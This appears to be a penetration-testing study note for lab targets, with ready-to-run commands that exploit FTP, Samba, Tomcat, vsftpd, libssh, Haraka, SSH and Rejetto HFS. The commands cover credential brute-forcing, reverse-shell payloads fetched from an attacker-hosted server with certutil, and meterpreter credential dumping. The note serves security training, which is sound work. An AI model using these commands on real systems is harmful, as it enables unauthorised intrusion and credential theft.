Linux Service Exploitation

Linux Service Exploitation

Navigation

Sections in This Note


Exploiting FTP

FTP is a protocol that uses TCP port 21 and facilitates file sharing between a server and client(s). It is frequently used for transferring files to/from a web server's directory. FTP authentication requires a username and password combination, so we can brute-force it to identify legitimate credentials.

# Find version of FTP
nmap -p21 -sV -O 192.67.22.3

# Brute force
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.67.22.3 -t 4 ftp

# Find whether anonymous login is allowed
nmap (IPaddress) -p21 --script ftp-anon

Exploiting SAMBA

SMB (Server Message Block) is a network file sharing protocol used to facilitate the sharing of files and peripherals between computers on a LAN. SMB uses port 445 (TCP); originally SMB ran on top of NetBIOS using port 139.

SAMBA utilizes username and password authentication to obtain access to a server or network share. We can brute-force SAMBA to obtain legitimate credentials. After obtaining credentials, we can use SMBMap to enumerate SAMBA share drives, list share contents, download files, and execute remote commands on the target. We can also use smbclient, a client that is part of the SAMBA software suite, which communicates with a LAN Manager server and offers an interface similar to the ftp program. It can be used to download files from the server, upload files to the server, and retrieve directory information.


Linux Privilege Escalation

Apache Tomcat Server

Apache Tomcat is a popular, free, open-source Java servlet web server, used to build and host dynamic websites/web apps based on the Java platform. Runs on TCP port 8080 by default. Apache Tomcat V8.5.19 is vulnerable to a remote code execution vulnerability, allowing an attacker to upload and execute a JSP payload.

service postgresql start
msfconsole
workspace -a apache
db_nmap -sS -sV -O (IPaddress)

search type:exploit tomcat_jsp
use exploit/multi/http/tomcat_jsp_upload_bypass
set payload java/jsp_shell_bind_tcp
set SHELL cmd
run

This creates a shell cmd interface. To get a meterpreter session:

(new terminal)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(attacker IP) LPORT=(portnumber) -f exe > meterpreter.exe
sudo python -m SimpleHTTPServer 80

# back to the old terminal (shell cmd)
certutil -urlcache -f http://(IPaddress)/meterpreter.exe meterpreter.exe
# Back to new window
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (IPaddress)
set LPORT (portnumber)
run

This creates a meterpreter session when .\meterpreter.exe is executed in the shell cmd.

Load kiwi extension:

Command: load kiwi

Exploiting FTP (Linux Target — vsftpd)

FTP uses TCP port 21. vsftpd is an FTP server for Unix-like systems including Linux, and is the default FTP server for Ubuntu, CentOS, and Fedora. vsftpd V2.3.4 is vulnerable to a command execution vulnerability facilitated by a malicious backdoor added to the vsftpd download archive through a supply chain attack.

service postgresql start
msfconsole
db_nmap -sS -sV -O (IPaddress)

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS (IPaddress)
run

bin/bash -i
# (this will open a shell cmd)

To get the meterpreter session (press ctrl+z to background the session):

search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
set LHOST (IPaddress)
set SESSION 1
run

Exploiting Samba

SAMBA is the Linux implementation of SMB, allowing Windows systems to access Linux shares/devices. Samba V3.5.0 is vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, causing the server to load and execute it.

service postgresql start
msfconsole
db_nmap -sS -sV -O (ipaddress)

search type:exploit name:samba
use exploit/linux/samba/is_known_pipename
set RHOSTS (ipaddress)
run

Background to get meterpreter:

search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
set LHOST (IPaddress)
set SESSION 1
run

Exploiting SSH Server (libssh)

libssh is a multiplatform C library implementing the SSHv2 protocol on client and server side. libssh V0.6.0–0.8.0 is vulnerable to an authentication bypass vulnerability that can be exploited to execute commands on the target server.

service postgresql start
msfconsole
search libssh_auth_bypass
use auxiliary/scanner/ssh/libssh_auth_bypass
set RHOSTS (ipaddress)
set SPAWN_PTY true
run

Background to get meterpreter:

search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
set LHOST (IPaddress)
set SESSION 1
run

Exploiting SMTP Server (Haraka)

Haraka is an open-source, high-performance SMTP server developed in Node.js, with a plugin for processing attachments. Haraka versions prior to V2.8.9 are vulnerable to command injection.

msfconsole
search type:exploit name:haraka
use exploit/linux/smtp/haraka
set RHOST (ipaddress)
set LHOST (ipaddress)
set email_to root@attackdefense.test
set SRVPORT 9898
set payload linux/x64/meterpreter_reverse_http
run

Post Exploitation

The Meterpreter payload operates via DLL injection and is executed in memory on the target system, making it difficult to detect. It communicates over a stager socket and provides an interactive command interpreter facilitating system command execution, file system navigation, keylogging, and more. It also allows loading custom scripts/plugins dynamically. MSF provides various meterpreter payload types depending on the target environment/OS architecture.


Migrated from Unsorted Notes — Exploiting SSH

Exploiting SSH

SSH is a remote administration protocol offering encryption, the successor to Telnet. Uses TCP port 22 by default. Authentication can be configured in two ways:

Find the SSH version:

Commands:
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.245.211.3
exploit

Find SSH login credentials:

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.245.211.3
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
set STOP_ON_SUCCESS true
set VERBOSE true
exploit
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.245.211.3
RHOSTS => 192.245.211.3
msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(scanner/ssh/ssh_login) > exploit

[-] 192.245.211.3:22 - Failed: 'sysadmin:yourface'
[!] No active DB -- Credential data will not be saved!
[-] 192.245.211.3:22 - Failed: 'sysadmin:yahoo2'
[-] 192.245.211.3:22 - Failed: 'sysadmin:window1'
[-] 192.245.211.3:22 - Failed: 'sysadmin:whoareyou'

Migrated from Unsorted Notes — Rejetto HFS (HTTP File Server)

Rejetto HFS (HTTP File Server)

An HTTP File Server (HFS) is a web server designed for file & document sharing, typically running on TCP port 80. Rejetto HFS is a popular free and open-source HTTP file server for Windows and Linux. Rejetto HFS V2.3 is vulnerable to a remote command execution attack. MSF has an exploit module for this.

service postgresql start
msfconsole
workspace -a HFS
setg RHOSTS (ipaddress)
db_nmap -sS -sV -O (ipaddress)

search type:exploit name:rejetto
use exploit/windows/http/rejetto_hfs_exec
set payload windows/x64/meterpreter/reverse_tcp
set LPORT (attacker port)
set LHOST (attacker ip)
run
Powered by Forestry.md